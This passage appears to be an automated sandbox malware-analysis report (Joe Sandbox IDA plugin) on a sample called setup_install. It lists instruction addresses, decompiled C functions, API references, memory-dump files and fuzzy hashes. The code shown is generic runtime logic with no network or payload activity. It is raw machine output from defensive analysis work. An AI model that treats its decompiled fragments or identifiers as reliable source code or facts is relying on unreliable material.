0x00413942
0x00413942
0x00413946
0x00413948
0x00000000
0x00000000
0x00000000
0x00413948
0x00000000
0x00413942
0x0041390c
0x00413916
0x00413918
0x0041391e
0x00413920
0x00413922
0x00413924
0x00414020
0x00414022
0x00414024
0x00000000
0x00000000
0x00000000
0x00414024
0x0041392a
0x0041392c
0x0041392e
0x00413930
0x00000000
0x00000000
0x00000000
0x0041402a
0x0041402a
0x00414030
0x00414034
0x00414036
0x00414038
0x00414038
0x00414040
0x00414047
0x00000000
0x00414047
0x00413900
0x00413900
0x00413904
0x00413904
0x00413c34
0x00413c37
0x00413c3c
0x00413c41
0x00413c44
0x00413c47
0x00413c49
0x00000000
0x00000000
0x00000000
0x00413c49
0x00413c17
0x00413f8a
0x00413f91
0x00413f9b
0x00413fa3
0x00413fa7
0x00413fae
0x00413fb2
0x00413fb9
0x00413fbc
0x00413fc0
0x00413fc4
0x00413fc6
0x00413fca
0x004141c0
0x004141c2
0x004141c4
0x004141c8
0x004141ca
0x00000000
0x00000000
0x00413fe5
0x00413fe5
0x00413fe7
0x00413feb
0x00413fed
0x00413fef
0x00000000
0x00000000
0x00413ff1
0x00413ff1
0x00413ffb
0x00413ffb
0x00414002
0x00414006
0x0041400d
0x00000000
0x0041400d
0x00413fd0
0x00413fd3
0x00414133
0x00414135
0x00414137
0x00000000
0x00000000
0x00000000
0x0041413d
0x00413fd9
0x00413fdb
0x00413fdd
0x00413fe1
0x00413fe3
0x00000000
0x00000000
0x00000000
0x00413fe3
0x00413cac
0x00413cae
0x00413cb0
0x004140c0
0x004140c2
0x004140ca
0x004140d5
0x004140dd
0x004140e5
0x004140e9
0x00000000
0x004140e9
0x00413cb6
0x00413cbe
0x00413cbe
0x00413cc3
0x00413cd0
0x00413cd0
0x00413cd2
0x00413cda
0x00413ce5
0x00413ced
0x00413cf1
0x00000000
0x00413cf1
0x00413cc5
0x00413cca
0x00414542
0x00414549
0x00000000
0x00414549
0x00000000
0x00413cca
0x00413b46
0x00413b48
0x00000000
0x00000000
0x00413b4e
0x00413b50
0x00413b55
0x00413b57
0x00413b59
0x00413b5d
0x004142ea
0x004142ed
0x004142ef
0x004142f5
0x00000000
0x004142f5
0x00413b63
0x00413b65
0x00413d80
0x00413d84
0x00413d8b
0x00413d96
0x00000000
0x00000000
0x00413d9c
0x00413da0
0x00413da7
0x00413daa
0x00414539
0x00413de5
0x00413de5
0x00413de8
0x00413e05
0x00413e05
0x00413e09
0x00413e10
0x00413e13
0x00413e13
0x00413e16
0x00413e1a
0x00413e21
0x00413e2d
0x00000000
0x00413e2d
0x00413dea
0x00413dea
0x00413dee
0x00413df0
0x00413df3
0x00413df5
0x00413df9
0x00413dfb
0x00413dfd
0x00413dff
0x00000000
0x00000000
0x00000000
0x00413dff
0x00413db0
0x00413db3
0x00413db5
0x00000000
0x00000000
0x00413dbb
0x00413dc2
0x00413ddb
0x00413ddb
0x00413dde
0x00413de1
0x00413de3
0x00000000
0x00000000
0x00413dd0
0x00413dd5
0x00000000
0x00000000
0x00413dd5
0x00000000
0x00413ddb
0x00413b6b
0x00413b6d
0x00413b78
0x00413b80
0x00413b8b
0x00413b93
0x00413b97
0x00000000
0x00413b15
0x00413b15
0x00413b18
0x00413b1a
0x00413e34
0x00413e34
0x00413e38
0x00413e3a
0x00414150
0x00414150
0x00414157
0x0041415b
0x0041415b
0x0041415f
0x00414163
0x00414166
0x0041416a
0x00000000
0x00000000
0x00414170
0x00414177
0x00414573
0x00414577
0x0041457a
0x0041457c
0x00414580
0x0041417d
0x0041417d
0x0041418d
0x0041418d
0x00414194
0x0041419b
0x0041419f
0x004141a7
0x00413e47
0x00413e47
0x00413e4e
0x00413e58
0x00413e64
0x00413e70
0x00413e7f
0x00413e84
0x00413e8b
0x00413e92
0x00413e95
0x004137a2
0x004137a2
0x004137a6
0x004137ad
0x004137af
0x00412fd1
0x00412fd1
0x00412fd8
0x00412fda
0x00412fdc
0x00412fe3
0x00412fea
0x00412fea
0x00412fec
0x00412ff0
0x00412ff2
0x00412ff4
0x00412ff4
0x00412ff4
0x00412ff4
0x00412ffc
0x00412ffe
0x00413004
0x00413008
0x0041300c
0x00413010
0x00413017
0x0041301f
0x00413029
0x00413029
0x00412c1c
0x00412c1c
0x004137b5
0x004137b9
0x004137bb
0x004137bd
0x004137c3
0x004137ca
0x004137cd
0x004137cf
0x004137d2
0x004137d5
0x004137d7
0x004137d9
0x004137d9
0x004137d9
0x004137dc
0x004137de
0x00413060
0x00413060
0x00413063
0x0041306a
0x0041306f
0x00413075
0x004137e4
0x004137e4
0x004137e4
0x004133d5
0x004133d5
0x004133dc
0x004133e7
0x004133ec
0x004133f2
0x004133f2
0x00000000
0x004137bd
0x00413e9b
0x00413e9e
0x00413ea2
0x00413ea5
0x00413ea8
0x00414463
0x00414467
0x00414469
0x00413768
0x00413768
0x0041376f
0x0041377a
0x00413781
0x00413786
0x0041378c
0x00413793
0x0041379a
0x0041379d
0x0041379d
0x004137a0
0x00000000
0x004137a0
0x00413ec0
0x00413eca
0x00413ecf
0x00413ed6
0x00413edd
0x00413ee8
0x00413ef3
0x00413ef6
0x00413ef8
0x00413eff
0x00413f06
0x00413f08
0x00413f0b
0x00413f0e
0x00413f11
0x00413f13
0x00413f15
0x00413f2e
0x00413f2e
0x00413f2e
0x00413f31
0x00413f3c
0x00413f3e
0x00413f40
0x00413f40
0x00000000
0x00413f31
0x00413f20
0x00413f20
0x00413f23
0x00413f2a
0x00413f2a
0x00000000
0x00413f20
0x00413eae
0x00413eb1
0x00414452
0x00414456
0x00414458
0x00000000
0x00000000
0x00000000
0x0041445e
0x00413eb7
0x00413eba
0x00000000
0x00000000
0x00000000
0x00413eba
0x00413e40
0x00413e40
0x00000000
0x00413e40
0x00000000
0x00413b1a
0x00413d59
0x00413d59
0x00413d63
0x00413d68
0x00413d70
0x00000000
0x00413d70
0x00413942

APIs

Part of subcall function 0041A5B0: RtlLeaveCriticalSection.NTDLL ref: 0041A5EE

memcpy.MSVCRT ref: 004139A5
memcpy.MSVCRT ref: 004139E0

Strings

!, xrefs: 00413B6D
, xrefs: 00413B80

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: memcpy$CriticalLeaveSection
String ID: $!
API String ID: 2458919216-2056089098
Opcode ID: f8958c1bdeb3552906671cd24f73003e42d5bec22a668556e7ea6c735015c4ad
Instruction ID: 07c880748270b9d56d91bd41756c8c77d1ce4ec60a8818f8a404d1652e2a3c94
Opcode Fuzzy Hash: f8958c1bdeb3552906671cd24f73003e42d5bec22a668556e7ea6c735015c4ad
Instruction Fuzzy Hash: DAA1F7B06097418FC720EF29C584A9BBBE1BF84754F058D2EE9C487311E778E9948B87

Uniqueness

Uniqueness Score: -1.00%

Function 00407348, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407348(void* __ebx) {
				intOrPtr _t62;
				intOrPtr* _t64;
				void* _t67;
				intOrPtr _t75;
				intOrPtr _t81;
				intOrPtr* _t83;
				void* _t84;
				void* _t86;

				_t67 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x120)) == 0) {
					_t64 = E00402DB0(__ebx, _t84 + 8);
					if(_t64 == 0) {
						L22:
						 *(_t67 + 0x118) = 1;
						_t62 =  *((intOrPtr*)(_t86 + 0x34));
						_t81 =  *((intOrPtr*)(_t84 + 4)) - 1;
						_t75 =  *((intOrPtr*)(_t67 + 0x11c)) - 1;
						goto L1;
					}
					if( *_t64 == 0x2f) {
						if( *((intOrPtr*)(__ebx + 0x124)) < 0 || _t64 != 0) {
							goto L10;
						} else {
							goto L22;
						}
					}
					L10:
					_t83 =  *((intOrPtr*)(_t67 + 0x110));
					 *((intOrPtr*)(_t67 + 0x110)) =  *_t83;
					E00405780(_t67, _t64,  *((intOrPtr*)(_t86 + 0x18)));
					 *((intOrPtr*)(_t67 + 0x110)) = _t83;
					_t62 =  *((intOrPtr*)(_t86 + 0x34));
					_t81 =  *((intOrPtr*)(_t84 + 4)) - 1;
					_t75 =  *((intOrPtr*)(_t67 + 0x11c)) - 1;
				} else {
					__eax =  *(__ebx + 0x100);
					__esi = "auto:";
					__edi = 0x4a313d;
					__ecx = 0x61;
					L6:
					L6:
					if(__eax != 0xff) {
						__edx = __eax;
						__eax = __eax + 1;
					} else {
						__eax =  *(__ebx + 0x10c);
						 *((char*)(__ebx + 0xff)) = 0;
						__esp[6] = __cl;
						__esp[2] =  *(__ebx + 0x10c);
						__esp[1] = 0xff;
						 *__esp = __ebx;
						__eax =  *((intOrPtr*)(__ebx + 0x108))();
						 *((intOrPtr*)(__ebx + 0x128)) =  *((intOrPtr*)(__ebx + 0x128)) + 1;
						__eax = 1;
						__edx = 0;
						__ecx = __esp[6] & 0x000000ff;
					}
					__esi =  &(__esi[1]);
					 *(__ebx + 0x100) = __eax;
					 *(__ebx + __edx) = __cl;
					 *(__ebx + 0x104) = __cl;
					if(__edi == __esi) {
						goto L11;
					}
					__ecx =  *__esi & 0x000000ff;
					goto L6;
					L11:
					__eax =  *(__ebp + 8);
					__esp[1] = "%d";
					__eax =  *(__ebp + 8) + 1;
					__esp[2] =  *(__ebp + 8) + 1;
					__eax =  &(__esp[0x10]);
					 *__esp = __eax;
					__edi = __eax;
					__esp[7] = __eax;
					__eax = sprintf(??, ??);
					__edx = __edi;
					do {
						__ecx =  *__edx;
						__edx = __edx + 4;
						__eax = __ecx - 0x1010101;
						__eax = __eax & __ecx;
						__eax = __eax & 0x80808080;
					} while (__eax == 0);
					__eax = __eax >> 0x10;
					__eax =  ==  ? __eax >> 0x10 : __eax;
					__ecx = __edx + 2;
					__edx =  ==  ? __edx + 2 : __edx;
					__ecx = __eax;
					__cl = __cl + __al;
					asm("sbb edx, 0x3");
					__edx = __edx - __esp[7];
					if(__edx == 0) {
						L19:
						_t52 = __ebp + 4; // 0x4a3127
						__edi =  *_t52;
						__eax = __esp[0xd];
						__esi =  *_t52 - 1;
						 *((intOrPtr*)(__ebx + 0x11c)) =  *((intOrPtr*)(__ebx + 0x11c)) - 1;
						goto L1;
					}
					__edi = __esp[7];
					__eax =  *(__ebx + 0x100);
					__esi = __edi + __edx;
					do {
						__edx =  *__edi & 0x000000ff;
						if(__eax != 0xff) {
							__ecx = __eax;
							__eax = __eax + 1;
						} else {
							__eax =  *(__ebx + 0x10c);
							 *((char*)(__ebx + 0xff)) = 0;
							__esp[6] = __dl;
							__esp[2] =  *(__ebx + 0x10c);
							__esp[1] = 0xff;
							 *__esp = __ebx;
							__eax =  *((intOrPtr*)(__ebx + 0x108))();
							 *((intOrPtr*)(__ebx + 0x128)) =  *((intOrPtr*)(__ebx + 0x128)) + 1;
							__eax = 1;
							__ecx = 0;
							__edx = __esp[6] & 0x000000ff;
						}
						__edi = __edi + 1;
						 *(__ebx + 0x100) = __eax;
						 *(__ebx + __ecx) = __dl;
						 *(__ebx + 0x104) = __dl;
					} while (__esi != __edi);
					goto L19;
				}
				L1:
				 *((intOrPtr*)(_t67 + 0x12c)) = _t62;
				 *((intOrPtr*)(_t84 + 4)) = _t81;
				 *((intOrPtr*)(_t67 + 0x11c)) = _t75;
				return _t62;
			}

0x00407348
0x00407350
0x0040849c
0x004084a3
0x004096bd
0x004096bd
0x004096ca
0x004096ce
0x004096d7
0x00000000
0x004096d7
0x004084ac
0x004096aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004096aa
0x004084b2
0x004084b2
0x004084be
0x004084c8
0x004084d0
0x004084d6
0x004084da
0x004084e3
0x00407356
0x00407356
0x0040735c
0x00407361
0x00407366
0x00000000
0x0040738f
0x00407394
0x0040736d
0x0040736f
0x00407396
0x00407396
0x0040739c
0x004073a3
0x004073a7
0x004073ab
0x004073b3
0x004073b6
0x004073bc
0x004073c3
0x004073c8
0x004073ca
0x004073ca
0x00407372
0x00407375
0x0040737b
0x0040737e
0x00407386
0x00000000
0x00000000
0x0040738c
0x00000000
0x004086fa
0x004086fa
0x004086fd
0x00408705
0x00408708
0x0040870c
0x00408710
0x00408713
0x00408715
0x00408719
0x0040871e
0x00408720
0x00408720
0x00408722
0x00408725
0x0040872d
0x0040872f
0x0040872f
0x00408738
0x00408740
0x00408743
0x00408746
0x00408749
0x0040874b
0x0040874d
0x00408750
0x00408754
0x004087c5
0x004087c5
0x004087c5
0x004087c8
0x004087cc
0x004087d5
0x00000000
0x004087d5
0x00408756
0x0040875a
0x00408760
0x00408780
0x00408780
0x00408788
0x00408765
0x00408767
0x0040878a
0x0040878a
0x00408790
0x00408797
0x0040879b
0x0040879f
0x004087a7
0x004087aa
0x004087b0
0x004087b7
0x004087bc
0x004087be
0x004087be
0x0040876a
0x0040876d
0x00408773
0x00408776
0x0040877c
0x00000000
0x00408780
0x00405981
0x00405981
0x00405987
0x0040598a
0x0040599a

Strings

auto:, xrefs: 0040735C
=1J, xrefs: 00407361
'1J, xrefs: 004087C5

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID: '1J$=1J$auto:
API String ID: 0-1507453681
Opcode ID: b449d66e6c46469fcdd7825b700a1a2b75f2e641a14a5689b88c19f7cee475ef
Instruction ID: 3184953e5514aaa8108e5cdf852b5211fb2b0ee009255e1fdf3c21a7fc274c08
Opcode Fuzzy Hash: b449d66e6c46469fcdd7825b700a1a2b75f2e641a14a5689b88c19f7cee475ef
Instruction Fuzzy Hash: 6B517171608242CBCB05CF28C5807EA7BE1AF95304F18857EECC89F386D779A885DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040625A, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040625A(void* __eax, signed char* __ebx, void* __edi) {
				signed char* _t165;
				signed int _t166;
				signed char _t173;
				signed char* _t178;
				intOrPtr* _t189;
				int _t192;
				intOrPtr* _t203;
				intOrPtr _t204;
				signed char* _t224;
				signed int _t228;
				intOrPtr* _t230;
				signed char _t240;
				signed char** _t244;
				signed char _t260;
				signed char* _t264;
				intOrPtr _t265;
				signed char* _t269;
				intOrPtr _t270;
				void* _t273;
				signed char** _t275;

				_t224 = __ebx;
				if( *( *(_t273 + 0xc)) != 0x38) {
					 *(__ebx + 0x118) = 1;
					L15:
					_t224[0x12c] = _t178;
					 *((intOrPtr*)(_t273 + 4)) = _t270;
					_t224[0x11c] = _t260;
					return _t178;
				}
				_t226 =  *((intOrPtr*)(_t273 + 8));
				_t165 =  *( *( *((intOrPtr*)(_t273 + 8)) + 8));
				if(_t165[1] == 0x63) {
					_t166 =  *_t165 & 0x000000ff;
					if(_t166 - 0x63 <= 1 || _t166 - 0x72 <= 1) {
						E0040B3C0(_t224, _t226, _t275[6]);
						if(_t224[0x100] == 0xff) {
							_t224[0xff] = 0;
							_t275[1] = 0xff;
							_t275[2] = _t224[0x10c];
							 *_t275 = _t224;
							_t224[0x108]();
							_t224[0x128] = _t224[0x128] + 1;
							_t224[0x100] = 0;
						}
						_t169 = _t224[0x100];
						_t269 = ">(";
						_t69 = _t169 + 1; // 0x1
						_t224[0x100] = _t69;
						_t224[_t224[0x100]] = 0x3c;
						_t224[0x104] = 0x3c;
						E00405780(_t224,  *((intOrPtr*)( *(_t273 + 0xc) + 8)), _t275[6]);
						_t240 = _t224[0x100];
						do {
							_t228 =  *_t269 & 0x000000ff;
							_t173 = _t240;
							if(_t240 == 0xff) {
								_t224[0xff] = 0;
								_t275[7] = _t228;
								_t275[2] = _t224[0x10c];
								_t275[1] = 0xff;
								 *_t275 = _t224;
								_t224[0x108]();
								_t224[0x128] = _t224[0x128] + 1;
								_t228 = _t275[7] & 0x000000ff;
								_t173 = 0;
							}
							_t86 = _t173 + 1; // 0x1
							_t240 = _t86;
							_t269 =  &(_t269[1]);
							_t224[0x100] = _t240;
							_t224[_t173] = _t228;
							_t224[0x104] = _t228;
						} while (0x4a32d0 != _t269);
						E00405780(_t224,  *((intOrPtr*)( *(_t273 + 0xc) + 0xc)), _t275[6]);
						if(_t224[0x100] == 0xff) {
							_t224[0xff] = 0;
							_t275[1] = 0xff;
							_t275[2] = _t224[0x10c];
							 *_t275 = _t224;
							_t224[0x108]();
							_t224[0x128] = _t224[0x128] + 1;
							_t224[0x100] = 0;
						}
						_t103 = _t224[0x100] + 1; // 0x1
						_t224[0x100] = _t103;
						_t224[_t224[0x100]] = 0x29;
						_t178 = _t275[0xd];
						_t224[0x104] = 0x29;
						_t109 =  *((intOrPtr*)(_t273 + 4)) - 1; // 0xfe
						_t270 = _t109;
						_t260 = _t224[0x11c] - 1;
						goto L15;
					} else {
						goto L2;
					}
				}
				L2:
				 *_t275 = _t273 + 0xc;
				if(E0040B550(_t224, _t226, _t275[6]) != 0) {
					_t178 = _t275[0xd];
					_t270 =  *((intOrPtr*)(_t273 + 4)) - 1;
					_t260 = _t224[0x11c] - 1;
					goto L15;
				}
				_t189 =  *((intOrPtr*)(_t273 + 8));
				if( *_t189 == 0x31) {
					_t244 =  *(_t189 + 8);
					if(_t244[2] == 1 &&  *(_t244[1]) == 0x3e) {
						if(_t224[0x100] == 0xff) {
							_t224[0xff] = 0;
							_t275[1] = 0xff;
							_t275[2] = _t224[0x10c];
							 *_t275 = _t224;
							_t224[0x108]();
							_t224[0x128] = _t224[0x128] + 1;
							_t224[0x100] = 0;
						}
						_t132 = _t224[0x100] + 1; // 0x1
						_t224[0x100] = _t132;
						_t224[_t224[0x100]] = 0x28;
						_t224[0x104] = 0x28;
						_t189 =  *((intOrPtr*)(_t273 + 8));
					}
				}
				_t275[1] = 0x4a2d36;
				 *_t275 =  *( *(_t189 + 8));
				_t192 = strcmp(??, ??);
				_t230 =  *((intOrPtr*)( *(_t273 + 0xc) + 8));
				if(_t192 != 0 ||  *_t230 != 3) {
					E0040B460(_t224, _t230, _t275[6]);
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0xc)))) != 0x29) {
						_t224[0x118] = 1;
					}
					E0040B460(_t224,  *((intOrPtr*)(_t230 + 8)), _t275[6]);
				}
				_t272 =  *((intOrPtr*)(_t273 + 8));
				_t264 =  *( *( *((intOrPtr*)(_t273 + 8)) + 8));
				_t275[1] = "ix";
				 *_t275 = _t264;
				if(strcmp(??, ??) != 0) {
					_t275[1] = 0x4a2d36;
					 *_t275 = _t264;
					if(strcmp(??, ??) != 0) {
						E0040B3C0(_t224, _t272, _t275[6]);
					}
					E0040B460(_t224,  *((intOrPtr*)( *(_t273 + 0xc) + 0xc)), _t275[6]);
				} else {
					if(_t224[0x100] == 0xff) {
						_t224[0xff] = 0;
						_t275[1] = 0xff;
						_t275[2] = _t224[0x10c];
						 *_t275 = _t224;
						_t224[0x108]();
						_t224[0x128] = _t224[0x128] + 1;
						_t224[0x100] = 0;
					}
					_t26 = _t224[0x100] + 1; // 0x1
					_t224[0x100] = _t26;
					_t224[_t224[0x100]] = 0x5b;
					_t224[0x104] = 0x5b;
					E00405780(_t224,  *((intOrPtr*)( *(_t273 + 0xc) + 0xc)), _t275[6]);
					if(_t224[0x100] == 0xff) {
						_t224[0xff] = 0;
						_t275[1] = 0xff;
						_t275[2] = _t224[0x10c];
						 *_t275 = _t224;
						_t224[0x108]();
						_t224[0x128] = _t224[0x128] + 1;
						_t224[0x100] = 0;
					}
					_t43 = _t224[0x100] + 1; // 0x1
					_t224[0x100] = _t43;
					_t224[_t224[0x100]] = 0x5d;
					_t224[0x104] = 0x5d;
				}
				_t203 =  *((intOrPtr*)(_t273 + 8));
				if( *_t203 == 0x31) {
					_t204 =  *((intOrPtr*)(_t203 + 8));
					if( *((intOrPtr*)(_t204 + 8)) != 1 ||  *((char*)( *((intOrPtr*)(_t204 + 4)))) != 0x3e) {
						goto L14;
					} else {
						if(_t224[0x100] == 0xff) {
							_t224[0xff] = 0;
							_t275[1] = 0xff;
							_t275[2] = _t224[0x10c];
							 *_t275 = _t224;
							_t224[0x108]();
							_t224[0x128] = _t224[0x128] + 1;
							_t224[0x100] = 0;
						}
						_t150 = _t224[0x100] + 1; // 0x1
						_t224[0x100] = _t150;
						_t224[_t224[0x100]] = 0x29;
						_t178 = _t275[0xd];
						_t224[0x104] = 0x29;
						_t156 =  *((intOrPtr*)(_t273 + 4)) - 1; // 0xfe
						_t270 = _t156;
						_t260 = _t224[0x11c] - 1;
						goto L15;
					}
				} else {
					L14:
					_t265 =  *((intOrPtr*)(_t273 + 4));
					_t178 = _t275[0xd];
					_t50 = _t265 - 1; // 0xfe
					_t270 = _t50;
					_t260 = _t224[0x11c] - 1;
					goto L15;
				}
			}

0x0040625a
0x00406260
0x00406266
0x00405981
0x00405981
0x00405987
0x0040598a
0x0040599a
0x0040599a
0x00405815
0x0040581b
0x00405821
0x00409468
0x00409471
0x00409484
0x00409493
0x0040949b
0x004094a2
0x004094aa
0x004094ae
0x004094b1
0x004094b7
0x004094be
0x004094be
0x004094c8
0x004094ce
0x004094d8
0x004094db
0x004094e5
0x004094e9
0x004094f8
0x004094fd
0x00409503
0x00409503
0x00409506
0x0040950e
0x00409516
0x0040951d
0x00409521
0x00409525
0x0040952d
0x00409530
0x00409536
0x0040953d
0x00409542
0x00409542
0x00409544
0x00409544
0x00409547
0x0040954a
0x00409550
0x00409553
0x00409559
0x00409569
0x00409578
0x00409580
0x00409587
0x0040958f
0x00409593
0x00409596
0x0040959c
0x004095a3
0x004095a3
0x004095b3
0x004095b6
0x004095bc
0x004095c0
0x004095c4
0x004095ce
0x004095ce
0x004095d7
0x00000000
0x00000000
0x00000000
0x00000000
0x00409471
0x00405827
0x0040582e
0x0040583a
0x004096e2
0x004096e6
0x004096ef
0x00000000
0x004096ef
0x00405840
0x00405846
0x00409843
0x0040984a
0x00409866
0x0040986e
0x00409875
0x0040987d
0x00409881
0x00409884
0x0040988a
0x00409891
0x00409891
0x004098a1
0x004098a4
0x004098aa
0x004098ae
0x004098b5
0x004098b5
0x0040984a
0x0040584c
0x00405859
0x0040585c
0x00405864
0x00405869
0x0040587a
0x00409c5d
0x00409c63
0x00409c65
0x00409c65
0x00409c78
0x00409c78
0x0040587f
0x00405885
0x00405887
0x0040588f
0x00405899
0x004096f7
0x004096ff
0x00409709
0x00409c53
0x00409c53
0x0040971b
0x0040589f
0x004058a9
0x004058b1
0x004058b8
0x004058c0
0x004058c4
0x004058c7
0x004058cd
0x004058d4
0x004058d4
0x004058e4
0x004058e7
0x004058f1
0x004058f5
0x00405904
0x00405913
0x0040591b
0x00405922
0x0040592a
0x0040592e
0x00405931
0x00405937
0x0040593e
0x0040593e
0x0040594e
0x00405951
0x00405957
0x0040595b
0x0040595b
0x00405962
0x00405968
0x00409aef
0x00409af6
0x00000000
0x00409b08
0x00409b12
0x00409b1a
0x00409b21
0x00409b29
0x00409b2d
0x00409b30
0x00409b36
0x00409b3d
0x00409b3d
0x00409b4d
0x00409b50
0x00409b56
0x00409b5a
0x00409b5e
0x00409b68
0x00409b68
0x00409b71
0x00000000
0x00409b71
0x0040596e
0x0040596e
0x0040596e
0x00405971
0x00405975
0x00405975
0x0040597e
0x00000000
0x0040597e

APIs

strcmp.MSVCRT ref: 0040585C
strcmp.MSVCRT ref: 00405892

Strings

6-J, xrefs: 0040584C
], xrefs: 0040595B

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strcmp
String ID: 6-J$]
API String ID: 1004003707-589564193
Opcode ID: 594d4f61d6de717d6ecdbdf6edbef6b4fe40f0ca5a9336aac6a39aa308bb2917
Instruction ID: f7edcdb524db32f17d602d4239aba1540ed703c9fbe980a60820000822300c83
Opcode Fuzzy Hash: 594d4f61d6de717d6ecdbdf6edbef6b4fe40f0ca5a9336aac6a39aa308bb2917
Instruction Fuzzy Hash: D541E374604205CFCB11DF28C48479ABBE1EF59318F0885BAEC885F356D379A885DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00412400, Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00412400(signed int __eax, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _t21;
				signed int _t22;
				signed int _t27;
				signed int _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int* _t32;

				_t28 = __edx;
				_t17 = __eax;
				_t27 = _a4;
				_t30 = _a8;
				_t29 = _a12;
				_t31 = _a16;
				L0041B5C8();
				 *((intOrPtr*)(__eax)) = 0;
				if(_t27 == 0 || _t31 > 2) {
					L0041B5C8();
					 *_t17 = 0x16;
					return 0xffffffff;
				} else {
					 *(_t27 + 0xc) =  *(_t27 + 0xc) & 0xffffffef;
					if(_t31 == 1) {
						 *_t32 = _t27;
						_t30 = _t30 + E004120E0(__eax, __edx);
						asm("adc edi, edx");
						_t31 = 0;
					}
					 *_t32 = _t27;
					L00411FA0();
					_t21 =  *(_t27 + 0xc);
					if((_t21 & 0x00000080) == 0) {
						_t22 = _t21 & 0x00000409;
						if(_t22 == 9) {
							 *((intOrPtr*)(_t27 + 0x18)) = 0x200;
						}
					} else {
						_t22 = _t21 & 0xfffffffc;
						 *(_t27 + 0xc) = _t22;
					}
					 *_t32 = _t27;
					L0041B5B0();
					_v32 = _t31;
					_v40 = _t30;
					_v36 = _t29;
					 *_t32 = _t22;
					L0041B598();
					return  ~((_t22 & _t28 & 0xffffff00 | (_t22 & _t28) == 0xffffffff) & 0x000000ff);
				}
			}

0x00412400
0x00412400
0x00412407
0x0041240b
0x0041240f
0x00412413
0x00412417
0x0041241e
0x00412424
0x004124a3
0x004124a8
0x00000000
0x0041242b
0x0041242b
0x00412432
0x00412493
0x0041249b
0x0041249d
0x0041249f
0x0041249f
0x00412434
0x00412437
0x0041243c
0x00412441
0x00412480
0x00412488
0x0041248a
0x0041248a
0x00412443
0x00412443
0x00412446
0x00412446
0x00412449
0x0041244c
0x00412451
0x00412455
0x00412459
0x0041245d
0x00412460
0x00000000
0x00412470

APIs

_errno.MSVCRT ref: 00412417
_fileno.MSVCRT ref: 0041244C
_lseeki64.MSVCRT ref: 00412460
_errno.MSVCRT ref: 004124A3

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: _errno$_fileno_lseeki64
String ID:
API String ID: 2364285915-0
Opcode ID: b9152af8a192fc4e4a201217e360f9288bbf3ac98fcb452379079d5eaee6a49a
Instruction ID: 03c975ad7d39bf140f78c37df461ce198f3c53a19b407a6e823c7ac24a1a60d8
